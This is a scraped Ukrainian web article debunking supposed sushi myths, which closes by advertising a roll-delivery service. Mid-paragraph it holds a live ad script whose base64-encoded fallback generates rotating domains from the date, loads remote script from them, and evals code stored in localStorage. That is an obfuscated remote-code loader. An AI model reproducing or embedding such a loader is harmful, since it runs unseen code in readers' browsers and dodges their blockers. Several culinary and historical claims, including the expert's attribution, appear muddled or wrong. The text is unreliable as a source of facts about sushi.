Викриття оман про суші

Суші займають особливе місце у серцях більшості гурманів. На цю традиційну азіатську страву приємно дивитися, і вона є кулінарною вишуканістю, якою захоплюються відвідувачі з усього світу. Однак, незважаючи на їхню популярність, існує безліч оман про суші. ВВС взяли інтерв’ю в експерта середньоазіатської кухні, Андрія Харченка і склали короткий список найпоширеніших.

1. Міф: завжди використовуйте соєвий соус

Соєвий соус — це смачна приправа, яка є в меню вже тисячі років. Цей соус, приготовлений із суміші розсолу, обсмаженого зерна, цвілі Aspergillus та побічного продукту ферментованих соєвих бобів, виник у Китаї за часів династії Західна Хань – з 206 р. до н.е. по 220 р. н.е.

Багато людей, замовляючи суші, за умовчанням мачають суші в соєвий соус, але його солоність часто перебиває ніжний смак самих суші. Досвідчені кухарі-сушисти розбавляють соус, отримуючи нікіри — тонший смак.

2. Міф: японці їдять багато суші

Як відомо, суші з’явилися не лише у Японії. Коли доходить до суші, люди в усьому світі їдять цю страву з початку 1900-х років.

Проте японці їдять стільки ж чи менше, ніж мешканці інших країн.

3. Міф: саке та васабі необхідні для приготування суші

Незважаючи на те, що більшість японців не їдять суші щотижня, вони найкраще знають, як їх готувати і що з ними їсти. Щодо напоїв, багато людей за замовчуванням обирають саке. Саке — рисовий продукт, який насправді не додає смаку філадельфія суші та іншим видам. Напої, які традиційно віддають перевагу знавцям суші, — це пиво чи зелений чай, зазначив Андрій Харченко у своєму інтерв’ю для ВВС. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Коли справа доходить до соусів, багато хто вибирає васабі; іноді чисто для новизни. Однак васабі не призначався для додавання у всі види суші – принаймні у великих кількостях. Сушисти готують страву з обережністю, і більшість суші вже містять васабі, тому, додаючи більше, ви ризикуєте стерти смак ласощів, які ви їсте. Єдиним винятком є сашими: додавання невеликої кількості васабі та соєвого соусу безпосередньо перед тим, як покласти його в рот, посилить смак.

4. Міф: суші корисні для здоров’я

Ідея про те, що маки корисні для здоров’я, не зовсім невірна, але важливо пам’ятати, що суші, які ми їмо, сильно відрізняються від страв, які їли кілька тисяч років тому. Риба, рис і морські водорості звучать як корисна страва, правда? На жаль, основні інгредієнти минулих століть значною мірою були замінені рибою, вирощеною в промислових масштабах, білим рисом, приготовленим з цукром, та жирними соусами, яких не було, коли були винайдені суші.

5. Міф: суші треба їсти паличками

Може стати несподіванкою те, що суші потрібно їсти руками, а не традиційним східно-азіатським посудом. У Японії так заведено — брати роли руками, вимивши їх попередньо у воді.

На завершення можна сказати, що якщо ви хочете насолодитися тонким та ароматним смаком японської кухні, зовсім не обов’язково відвідувати Японію. Оформити замовлення ролів ви можете на сайті онлайн доставки Рок-н-Ролл з доставкою додому. У меню представлений широкий асортимент смачних ролів з різноманітними інгредієнтами: лососем, куркою, креветками, ніжним вершковим сиром, овочами. Кожен замовник точно зможе знайти блюдо, що підходить під його смакові уподобання. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/vikrittya-oman-pro-sushi/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top